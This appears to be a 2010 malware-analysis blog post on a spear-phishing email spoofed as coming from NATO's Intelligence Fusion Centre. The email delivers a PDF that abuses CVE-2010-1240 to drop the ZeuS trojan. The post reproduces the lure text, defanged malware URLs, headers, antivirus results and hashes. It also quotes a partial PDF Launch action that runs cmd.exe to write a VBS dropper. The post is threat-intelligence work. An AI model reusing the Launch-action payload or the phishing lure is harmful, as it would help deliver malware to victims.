Aug 25 CVE-2010-1240 From Intelligence Fusion Centre with ZeuS trojan

CVE-2010-1240 Adobe Reader and Acrobat 9.x before 9.3.3, and 8.x before 8.2.3 on Windows and Mac OS X, do not restrict the contents of one text field in the Launch File warning dialog, which makes it easier for remote attackers to trick users into executing an arbitrary local program that was specified in a PDF document, as demonstrated by a text field that claims that the Open button will enable the user to read an encrypted message.

Update: Please read detailed analysis of this and associated attacks   
Crime or Espionage? by Nart Villeneuve

 Download  as a password protected archive (contact me if you need the password)

Intelligence Fusion Centre
In support of NATO
RAF Molesworth, United Kingdom
Unit 8845 Box 300, Huntingdon
CAMBS PE28 0QB

FROM: Intelligence Fusion Centre
SUBJECT: Military operation of the EU

Additional information can be found in the following report:

http:// gnarus.mobi/media/EuropeanUnion_MilitaryOperations_EN. zip
http:// quimeras.com.mx/media/EuropeanUnion_MilitaryOperations_EN.ip

> EUROPEAN UNION
> EUROPEAN SECURITY AND DEFENCE POLICY
> Military operation of the EU
> EU NAVFOR Somalia
>
> This military operation, called EU NAVFOR Somalia - operation
> "Atalanta", is launched in support of Resolutions 1814 (2008), 1816
> (2008), 1838 (2008) and 1846 (2008) of the United Nations Security Council (UNSC) in order to contribute to:
> -  the protection of vessels of the WFP (World Food Programme) delivering food aid to displaced
>    persons in Somalia;
> -  the protection of vulnerable vessels cruising off the Somali coast, and the deterrence, prevention
>    and repression of acts of piracy and armed robbery off the Somali coast.
> This operation, which is the first EU maritime operation, is conducted
> in the framework of the European Security and Defence Policy (ESDP).
>
>
> More information and background documents available on
> http:// gnarus.mobi/media/EuropeanUnion_MilitaryOperations_EN. zip
> and
> http:// quimeras.com.mx/media/EuropeanUnion_MilitaryOperations_EN. zip
>
> ________________________________________
> PRESS - EU Council Secretariat Tel: +32 (0)2 281 7640 / 6319

Headers

X-VirusChecked: Checked
X-Env-Sender: gnarusm@mail.thecopperstar.com
X-Msg-Ref: xxxxxxxxxxx
X-StarScan-Version: 6.2.4; banners=-,-,-
X-Originating-IP: [174.132.255.10]
X-SpamReason: No, hits=1.0 required=7.0 tests=BODY_RANDOMQ
Received: (qmail 15068 invoked from network); 26 Aug 2010 13:24:33 -0000
Received: from a.ff.84ae.static.theplanet.com (HELO mail.thecopperstar.com)
 (174.132.255.10)  by xxxxxxxxxx
 DHE-RSA-AES256-SHA encrypted SMTP; 26 Aug 2010 13:24:33 -0000
Received: from gnarusm by mail.thecopperstar.com with local (Exim 4.69)
 (envelope-from <gnarusm@mail.thecopperstar.com>) id 1OocRS-0006Y5-PR for
 XXXXXXXXXX; Thu, 26 Aug 2010 08:24:30 -0500
To: XXXXXXXXX
Subject: From Intelligence Fusion Centre to XXXXXXX
From: <ifc@ifc.nato.int>
Message-ID: <E1OocRS-0006Y5-PR@mail.thecopperstar.com>
Date: Thu, 26 Aug 2010 08:24:30 -0500
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - mail.thecopperstar.com

 174.132.255.10

 Hostname:    a.ff.84ae.static.theplanet.com
ISP:    THEPLANET.COM INTERNET SERVICES
Organization:    THEPLANET.COM INTERNET SERVICES
Type:    Broadband
Assignment:    Static IP
Country:    United States
State/Region:    Texas

File name: EuropeanUnion_MilitaryOperations_EN.pdf
 http://www.virustotal.com/file-scan/report.html?id=5761e303d7bc027df47b5b01a3e4e8e186eb36d3a4f40956768231ef3bbcac46-1282832496
 Submission date: 2010-08-26 14:21:36 (UTC)
Current status: finished
Result: 11 /41 (26.8%)
Avast 4.8.1351.0 2010.08.26 PDF:Risk-A
Avast5 5.0.594.0 2010.08.26 PDF:Risk-A
BitDefender 7.2 2010.08.26 Exploit.PDF-Dropper.Gen
eSafe 7.0.17.0 2010.08.26 PDF.DropperExploit.Gen
eTrust-Vet 36.1.7818 2010.08.26 PDF/Pidief.RU
F-Secure 9.0.15370.0 2010.08.26 Exploit.PDF-Dropper.Gen
GData 21 2010.08.26 Exploit.PDF-Dropper.Gen
Kaspersky 7.0.0.125 2010.08.26 Trojan-Dropper.VBS.Pdfka.b
nProtect 2010-08-26.01 2010.08.26 Exploit.PDF-Dropper.Gen
PCTools 7.0.3.5 2010.08.26 Trojan.Dropper
SUPERAntiSpyware 4.40.0.1006 2010.08.26 -
Symantec 20101.1.1.7 2010.08.26 Trojan.Dropper
Additional informationShow all 
MD5   : 8b3a3c4386e4d59c6665762f53e6ec8e

   /Type /Action
   /S /Launch
   /Win /F (cmd.exe) 
   /P (
   /c echo Dim BinaryStream > vbs1.vbs && echo Set BinaryStream = CreateObject("ADODB.Stream")

 -------------------------------------------------

Windows XPSP2 Adobe Reader 9.1

Quick flash of CMD.exe black window and we are looking at a pretty new icon on the desktop exe.exe

 Files created
c:\windows\system32\ntos.exe  28C4648F05F46A3EC37D664CEE0D84A8
same directory as the original file - exe.exe  5fb94eef8bd57fe8e20ccc56e33570c5

And these are the classic signs of old Zeus and this is what it is.


File name:
exe.exe
http://www.virustotal.com/file-scan/report.html?id=33ac66e78d410d03f5644fb1569ea7d28e823561e00b86593d9022f554127c7e-1282847843
3 /41 (7.3%)
AntiVir     8.2.4.46     2010.08.26     TR/Crypt.XPACK.Gen2
PCTools     7.0.3.5     2010.08.26     Trojan.Zbot
Symantec     20101.1.1.7     2010.08.26     Trojan.Zbot
Additional information
Show all
MD5   : 5fb94eef8bd57fe8e20ccc56e33570c5

File name: ntos.exe
http://www.virustotal.com/file-scan/report.html?id=c61fdc96fb7861396d7aa99a26cb6dff3f92aeeccf93d212a8fa3e166adec6aa-1282850806
Submission date: 2010-08-26 19:26:46 (UTC)
Result: 4 /39 (10.3%)
AntiVir 8.2.4.46 2010.08.26 TR/Crypt.XPACK.Gen2
Panda 10.0.2.7 2010.08.26 Suspicious file
PCTools 7.0.3.5 2010.08.26 Trojan.Zbot
Symantec 20101.1.1.7 2010.08.26 Trojan.Zbot
Additional informationShow all
MD5   : 28c4648f05f46a3ec37d664cee0d84a8